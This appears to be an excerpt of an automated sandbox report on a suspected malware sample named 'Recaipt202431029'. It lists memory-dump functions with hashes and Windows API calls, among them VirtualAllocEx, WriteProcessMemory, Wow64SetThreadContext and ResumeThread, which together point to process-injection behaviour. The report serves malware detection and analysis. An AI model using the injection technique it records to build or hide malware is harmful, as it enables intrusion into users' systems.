                • Opcode ID: ffa60f8513dd190d31bd5a5d9375a42936ceeeb7aaa665c933e47b2e8e97daf5
                • Instruction ID: 2574babfe6441690012243a6b0fe541175cff7cea8228696ed06cea09346ecf3
                • Opcode Fuzzy Hash: ffa60f8513dd190d31bd5a5d9375a42936ceeeb7aaa665c933e47b2e8e97daf5
                • Instruction Fuzzy Hash: F83178728002099FCB20DFAAD8457EEFFF1EF89320F24841AD559A7250C7799945CFA1

                Control-flow Graph of the function at 06869E50 [rendered graph omitted; basic-block edge list not reproduced]
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 7$Haq
                • API String ID: 0-1260677198
                • Opcode ID: 141c8d210d28a712d86df8c9114aabc378a78bb1d418b92faa9b1b977d18e0a0
                • Instruction ID: 8969a6bf9eabd0ba0a374819fc6468a5f2278ca14e2437210e8ca72d47c93967
                • Opcode Fuzzy Hash: 141c8d210d28a712d86df8c9114aabc378a78bb1d418b92faa9b1b977d18e0a0
                • Instruction Fuzzy Hash: BF229F30A00205CFDB59DF69C884BAEBBB6FF89300F148469E506EB295DB75ED41CB91

                Control-flow Graph of the function at 0850E878 [rendered graph omitted; basic-block edge list not reproduced]
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: ,aq$c:
                • API String ID: 0-1952009924
                • Opcode ID: 32416926f95f77176bab180962d57da2894bac3d21e44838c7542b68de2caa79
                • Instruction ID: 733365bbd1e588c128d773a29b585bf71dc40846d3a6833d44f163752441b99e
                • Opcode Fuzzy Hash: 32416926f95f77176bab180962d57da2894bac3d21e44838c7542b68de2caa79
                • Instruction Fuzzy Hash: 35A14F34A002059FCB14DFA9C545A9EBBB6FF88701B248529D806EB3A4DF74ED46CF91

                Control-flow Graph of the function at 06863978 [rendered graph omitted; basic-block edge list not reproduced]
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq$U
                • API String ID: 0-1429826326
                • Opcode ID: df15edea99e6791c76b7fb9fe24808e24c266e7a6a11626e2f1bf7ab8faed83a
                • Instruction ID: e14b5bca7123edc2f098aa3950ad62b2fc634092b83c60da510904aa6d62ab5b
                • Opcode Fuzzy Hash: df15edea99e6791c76b7fb9fe24808e24c266e7a6a11626e2f1bf7ab8faed83a
                • Instruction Fuzzy Hash: FB719D38608229CFEB958A2EC46577D77B1EB40344F04956ABE47CB3A1CA38DD44E792

                Control-flow Graph

                control_flow_graph 1963 6c7f183-6c7f18d 1965 6c7f196-6c7f198 1963->1965 1966 6c7f1b0 1965->1966 1967 6c7f19a-6c7f1a0 1965->1967 1968 6c7f1a4-6c7f1a6 1967->1968 1969 6c7f1a2 1967->1969 1968->1966 1969->1966
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q$$]q
                • API String ID: 0-127220927
                • Opcode ID: f5a981595a24fc2ec7df365acf5e023ef9e53c58bac497e3ce3a95fd709b3a53
                • Instruction ID: 603904ee20dad3322d4645356de783d3fb167481663b462278ddf510c4098e20
                • Opcode Fuzzy Hash: f5a981595a24fc2ec7df365acf5e023ef9e53c58bac497e3ce3a95fd709b3a53
                • Instruction Fuzzy Hash: 01D0A72060D3458FD77A1B369D549253BB46E01820F40069FC4B5C51F3CC18CA44C376
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Hb^q
                • API String ID: 0-932020720
                • Opcode ID: 1fb8c55903117ddaf30a1cf9c3bd9df1c019d26f7724576da112e7653358ca42
                • Instruction ID: 8ab1f617c46e69ad38ab583db60ef820f96070769c3865611394119efef785f5
                • Opcode Fuzzy Hash: 1fb8c55903117ddaf30a1cf9c3bd9df1c019d26f7724576da112e7653358ca42
                • Instruction Fuzzy Hash: 36426C34A002059FCB54DF69C984EAEBBF2FF48310F558599E445AB362D734EE85CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 3o
                • API String ID: 0-3445067109
                • Opcode ID: 75c171408607f41178e76cd528e8eccb77b42402871b6a2723951f9b00e495ec
                • Instruction ID: 412bf451ae1db8fe5f8610dcff6c8193aba0a33beeb58b46d6092aa580848143
                • Opcode Fuzzy Hash: 75c171408607f41178e76cd528e8eccb77b42402871b6a2723951f9b00e495ec
                • Instruction Fuzzy Hash: A1323378700601CFCB14DF29C588A6ABBF6FF98305B1584A9E506DB3A6DB34EC46CB51
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D1D446
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: f5d60187fdfa2bf3750e257444394fa8a6b280b82e68a8f54fff193bd830e9da
                • Instruction ID: 6d88af1f4d38c6377dd155c0602d1d9019b0e00066f08c7085f17f860b26d004
                • Opcode Fuzzy Hash: f5d60187fdfa2bf3750e257444394fa8a6b280b82e68a8f54fff193bd830e9da
                • Instruction Fuzzy Hash: 6BB19A71D00219DFEB64CFA8D840BEDBBF2BF49314F14856AD818AB240DBB59985CF91
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D1D446
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 21211d1a0bd34204a1095b39f5ca845357fa03b5b828739d3e453eed516de3b9
                • Instruction ID: e2d1a0ff629d24c5f5b63aaf28ac41bd308e53fbe67bfdbd3828d7165a14ab53
                • Opcode Fuzzy Hash: 21211d1a0bd34204a1095b39f5ca845357fa03b5b828739d3e453eed516de3b9
                • Instruction Fuzzy Hash: A1918C71D00219DFEB64CFA8D841BEDBBB2FF49304F148569E818AB240DBB59985CF91
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B67E
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 762619efc26c67e7f84cf94f15103a4286047223ac86395908b0359516435714
                • Instruction ID: 32e188581f99b7edcd0da6b9df0b1ae5277f84e327ed56892110202e6202a046
                • Opcode Fuzzy Hash: 762619efc26c67e7f84cf94f15103a4286047223ac86395908b0359516435714
                • Instruction Fuzzy Hash: 97815670A00B458FD724DF29D451B9ABBF1FF88300F00896DD48AD7A51DB39E946CB91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: a42b7e6159531d5c0dd97248e72c3eb38b548b64287da82b33f7db2fd2b9af54
                • Instruction ID: 27ed70daf0c49864d66a7c5877aae01c5f65561b48a02b12f7a34cb85be146ec
                • Opcode Fuzzy Hash: a42b7e6159531d5c0dd97248e72c3eb38b548b64287da82b33f7db2fd2b9af54
                • Instruction Fuzzy Hash: 0FD1A231B002258FDB258F6C858072AFBE6BF84622F14496ED905DB396DB70CC41CBE2
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00B659C9
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 476dfe0f2b00112702f75dce98427c4cdf7caf0217aca938606e13ecd0967529
                • Instruction ID: d20287b7c82184e8bbb2aef0cbab74beeea7a9383656df8a7a56f4bf8d80366c
                • Opcode Fuzzy Hash: 476dfe0f2b00112702f75dce98427c4cdf7caf0217aca938606e13ecd0967529
                • Instruction Fuzzy Hash: 5341DFB0C00A1DCBDB24DFA9C984A9DBBF5BF49304F20856AD408AB255DB756946CF90
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00B659C9
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: ea2258d5cd41f2fab960fc6e04e9a9febd7c55968bf9c55329dafcb476611a78
                • Instruction ID: 808bbce4dba14782b216b3ce33afbd9889d63bb64be4edafa46a2e7d5ece23f6
                • Opcode Fuzzy Hash: ea2258d5cd41f2fab960fc6e04e9a9febd7c55968bf9c55329dafcb476611a78
                • Instruction Fuzzy Hash: E441EEB0C00A1DCBDB24DFAAC984BCDBBF1BF49304F20856AD418AB255DB756946CF90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: 3b764a067bbdea62e6d26fa3be4611812a7b6f42d261e1f80fec6543eaa932f5
                • Instruction ID: f1b8d9258b2a822ad13b49e09935c7d00e38382157bc17858695b8861a297664
                • Opcode Fuzzy Hash: 3b764a067bbdea62e6d26fa3be4611812a7b6f42d261e1f80fec6543eaa932f5
                • Instruction Fuzzy Hash: A6D19C74B002159FDB44DF69C984AAEBBF6EF88300F54846AE405EB355DB34ED85CBA0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: &
                • API String ID: 0-1010288
                • Opcode ID: 0683a1c94f6a800822f351cbabbda70361719be5058d6d8b074f7e3fcd196e2d
                • Instruction ID: 73508220fcfd66ccff92bf5a17787dece478132452a4d3947c35186a6233c5dd
                • Opcode Fuzzy Hash: 0683a1c94f6a800822f351cbabbda70361719be5058d6d8b074f7e3fcd196e2d
                • Instruction Fuzzy Hash: C1C111747006129FDB489F7A959143E7BE7BF882403048969E92ADB3D5DF34EC05CBA1
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D1D018
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 07525436c56adcebb6a48063e0df8eee32649df86c585b7cf80b8e1897202ca2
                • Instruction ID: a25012d7d3fe5218b0ddee9d270d2164f5ecf5e3eb5d4f1523a6b42fa5d8ee00
                • Opcode Fuzzy Hash: 07525436c56adcebb6a48063e0df8eee32649df86c585b7cf80b8e1897202ca2
                • Instruction Fuzzy Hash: 662116B5D003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7799945CBA4
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6D8CE,?,?,?,?,?), ref: 00B6D98F
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: cfbb2f9d148bc520cce8f6791bd059eee766b2d28b698e751a246c02335f93a1
                • Instruction ID: 0874d5b8a3081cd6c0e3d95e9fe7d705d243f6afe9c3b89bf41a956dd7bdbfbe
                • Opcode Fuzzy Hash: cfbb2f9d148bc520cce8f6791bd059eee766b2d28b698e751a246c02335f93a1
                • Instruction Fuzzy Hash: 602114B5D002089FDB10DFAAD985ADEBFF8FB48310F14841AE918A7350D378A941CFA5
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6D8CE,?,?,?,?,?), ref: 00B6D98F
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: a5e721d5d0a7236cf83c6cf4a8c6eef4b7aa7afe6fdb0cacf37f3fd79683303f
                • Instruction ID: b632ff4df0b00b1af832fe8224c7471e27f168252c36ab8ee5ad07fe656d3424
                • Opcode Fuzzy Hash: a5e721d5d0a7236cf83c6cf4a8c6eef4b7aa7afe6fdb0cacf37f3fd79683303f
                • Instruction Fuzzy Hash: 452105B5D002089FDB10DF9AD984AEEBBF8FB48310F14845AE918A3350D379A940CFA0
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D1D0F8
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: d06e216cfc3ff377b1c1002c9bc62a68da1f65088b9f8c56fb9d41667394e453
                • Instruction ID: 077fc0d28d42f334fe9064b125e89a5d27494a33bb65c40235bf1b4e30bf331c
                • Opcode Fuzzy Hash: d06e216cfc3ff377b1c1002c9bc62a68da1f65088b9f8c56fb9d41667394e453
                • Instruction Fuzzy Hash: 082116B1C002499FCF10DFAAC885AEEFBF5FF48310F10842AE919A7250D7799941CBA0
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1CE6E
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 8d46abc5bd336e2d83f2c4264b66ac624e5d8432ea2ab529ebd907403518f4c0
                • Instruction ID: 93ce8f9ee0f7101f0974450b2e530552749ff8bd1cc5c24accc32ca3e5b4b150
                • Opcode Fuzzy Hash: 8d46abc5bd336e2d83f2c4264b66ac624e5d8432ea2ab529ebd907403518f4c0
                • Instruction Fuzzy Hash: B72145B19002099FCB10DFAAC4857EEBBF4EF49310F148429D519A7240CB789A45CFA0
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D1D0F8
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: c51b8a9baa179451ad7c1b8a911dbbe9f8ce4c5d733efbfe104bf2e779de916b
                • Instruction ID: 3521c25cd1ebee26c5c9a7ad7976c8ba5dc667aa7c2e647d93cda8e4b9617f00
                • Opcode Fuzzy Hash: c51b8a9baa179451ad7c1b8a911dbbe9f8ce4c5d733efbfe104bf2e779de916b
                • Instruction Fuzzy Hash: 022138B1C003499FCB10DFAAC881AEEFBF5FF48310F10842AE519A7240D7799941CBA0
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1CE6E
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 7801c8aa4c2b39d05dc36ee38dd68f17e06b4cea6635cca0eec6a1f3e890fe86
                • Instruction ID: 0e42695bf1d14e5146564bf3b7012e47915b7e3a24da0c4ad823b5d775269e71
                • Opcode Fuzzy Hash: 7801c8aa4c2b39d05dc36ee38dd68f17e06b4cea6635cca0eec6a1f3e890fe86
                • Instruction Fuzzy Hash: 382127B1D003099FDB10DFAAC4857EEBBF5EF89314F14842AD519A7240DB78AA45CFA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: efcf12e64b5089f95a4185e20d468096b76a37518ef7dad53f3fe01ee2492616
                • Instruction ID: d6585faf7d3835a1d695bbeb880ff26447840a02061bb9bba2da3c22e2f07c80
                • Opcode Fuzzy Hash: efcf12e64b5089f95a4185e20d468096b76a37518ef7dad53f3fe01ee2492616
                • Instruction Fuzzy Hash: 49C11834600606CFCB14CF18C980D6ABBF2FF88315B65CA69D45A9B6A6D731F846CF90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146492499.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8510000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: e1b49240def8413dd9e35de7944a211355f22f290a46224659a37ff80977175f
                • Instruction ID: c287cd10427785b5dc067bc54fa9ef4bcd8bd4836f96adb75e94dd523068c2aa
                • Opcode Fuzzy Hash: e1b49240def8413dd9e35de7944a211355f22f290a46224659a37ff80977175f
                • Instruction Fuzzy Hash: DAA145313042548FEB15DB69985066ABBE6FFC5322F28886ED849CB392CB35DC41C7A1
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1CF36
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 38ff7e128d43e412209bea1ee7c78a05928ec7f98c9f2445402ef39449c4eec1
                • Instruction ID: e03cfba599a5bd2a38d0c0e8ac53f80a3846891070e89e5b108a012967b8e0a1
                • Opcode Fuzzy Hash: 38ff7e128d43e412209bea1ee7c78a05928ec7f98c9f2445402ef39449c4eec1
                • Instruction Fuzzy Hash: 701137718002499FCB10DFAAC845AEEBFF5EF88310F108419E519A7250C779A940CFA0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 98daac2019d91de11acad6c272d379cd4576317986deff184e5dec7ed35f8620
                • Instruction ID: 772ad1e549828ecd02dcc9190b5beeb2e676203b7d05d816243fd690312f46b1
                • Opcode Fuzzy Hash: 98daac2019d91de11acad6c272d379cd4576317986deff184e5dec7ed35f8620
                • Instruction Fuzzy Hash: CB1146B1D002489ECB24DFAAD8457EEFFF4EF89320F20841AC419A7240C7799945CFA0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: f2cc633feec2e4c7bcf34b7bb9bdb713d476eac35f4ffaf40bed1000e562c788
                • Instruction ID: e4f94f0cee530c91b0a0936de473a5836a9c24ee45c8f8c037aba98b3dbfb728
                • Opcode Fuzzy Hash: f2cc633feec2e4c7bcf34b7bb9bdb713d476eac35f4ffaf40bed1000e562c788
                • Instruction Fuzzy Hash: E71128B1D002488FCB10DFAAC8457EEFBF5EF89324F208419D519A7240CB79A944CBA0
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B67E
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 22cfb7c1d89aaa104319d38845858bb52a86025a9b7650c59d7fc0b6991ff325
                • Instruction ID: 9072beda6c9ec47039ae5db99a9ae4d6715c1b95825df91f28b00c9ceec277e5
                • Opcode Fuzzy Hash: 22cfb7c1d89aaa104319d38845858bb52a86025a9b7650c59d7fc0b6991ff325
                • Instruction Fuzzy Hash: 7411F2B6C003498FCB10DF9AC444ADEFBF4EF89314F10846AD529A7210D379A945CFA5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 3o
                • API String ID: 0-3445067109
                • Opcode ID: 07a69eec06fb9cb0867bf2c1c0b7b726dc08193fee4b50f2ba0bcb50b9e567d7
                • Instruction ID: e75fecb581481961f4dc4a171346100313c3338ab2fab1a3955b42b54738bf10
                • Opcode Fuzzy Hash: 07a69eec06fb9cb0867bf2c1c0b7b726dc08193fee4b50f2ba0bcb50b9e567d7
                • Instruction Fuzzy Hash: 92B11438700605CFCB14DF29C584A6ABBF6FF99305B1584A9E446DB3A2DB34EC45CB61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: 34ac9b7ed2a08e6f907782bef86290c8f150fc1915df1a45b325fc1b4e38ffb1
                • Instruction ID: 53146b02dfbd91e24c309e4b2beb3c60bb7aea5ed9a75dcacc487971ac14fe08
                • Opcode Fuzzy Hash: 34ac9b7ed2a08e6f907782bef86290c8f150fc1915df1a45b325fc1b4e38ffb1
                • Instruction Fuzzy Hash: C4A19F70A007059FC719DF28D580A9EBBF6FF89300B2485A9D059DB362DB75ED4ACB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: ,aq
                • API String ID: 0-3092978723
                • Opcode ID: a869ba4ed671f063e1b2648e139ccc5b917cb4ae9301ddc87aecb5797df97257
                • Instruction ID: 9e04359a4f008acfa01fede7ca0b864c3c80367397229317c9bd358ee5034811
                • Opcode Fuzzy Hash: a869ba4ed671f063e1b2648e139ccc5b917cb4ae9301ddc87aecb5797df97257
                • Instruction Fuzzy Hash: 82719A74B003108FC7189F3CD898A2A7BEAFF99616B1544AEE506CB3B2DA74DC45CB50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 5a725cc376c53d6fa65c768f0c9e779ce914eca1889ddf2cd95af35fc1cc7e8e
                • Instruction ID: d3b83ce0ad45f33192a57d8e8b8437e6a8305c057c0c7db7d38f668ac6dd4780
                • Opcode Fuzzy Hash: 5a725cc376c53d6fa65c768f0c9e779ce914eca1889ddf2cd95af35fc1cc7e8e
                • Instruction Fuzzy Hash: F9814D74A00605CBDB24DFA9D4D46AEBBB2BF84352F248429D456AB394EF34ED42CF41
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 186334350f8572cbd105ac9758f456d000fa816f56d7804733779dbc71204695
                • Instruction ID: d29ac17ac7e0d74f2efeaf81f4cf7efd1601b085b84c5f9305c9509edaec76ab
                • Opcode Fuzzy Hash: 186334350f8572cbd105ac9758f456d000fa816f56d7804733779dbc71204695
                • Instruction Fuzzy Hash: 15715E74A00205CFDB24DFA9D4D86AEBBF6BF84362F24846DD456AB394EB309941CF41
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: cU"l^
                • API String ID: 0-329838493
                • Opcode ID: 9d26fc5906fcff6a60bda897b5eee543c88ed95075ffc873caf89fb7b9c1fc9e
                • Instruction ID: 0de045781dc2a4d9ae3c369266a8809c75f15c284a1b2fa28b04c6559e88710c
                • Opcode Fuzzy Hash: 9d26fc5906fcff6a60bda897b5eee543c88ed95075ffc873caf89fb7b9c1fc9e
                • Instruction Fuzzy Hash: 19717E30B002058FCB54EF69D998AAD7BF6EF88314F148469E506EB361DB75EC45CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: c:
                • API String ID: 0-1827501386
                • Opcode ID: 975b314e1363a056a3a150dcefa0b84c7f351d64ac463c1ebbbf74494f92191a
                • Instruction ID: f044dbcc152182709e6f49f3b2bc65b3334f676a17c742826be335707f15cb4c
                • Opcode Fuzzy Hash: 975b314e1363a056a3a150dcefa0b84c7f351d64ac463c1ebbbf74494f92191a
                • Instruction Fuzzy Hash: 5F715130A006099FCB18DF68D55499EBBF6FF88300B248569E816AB365DF70ED46CF91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
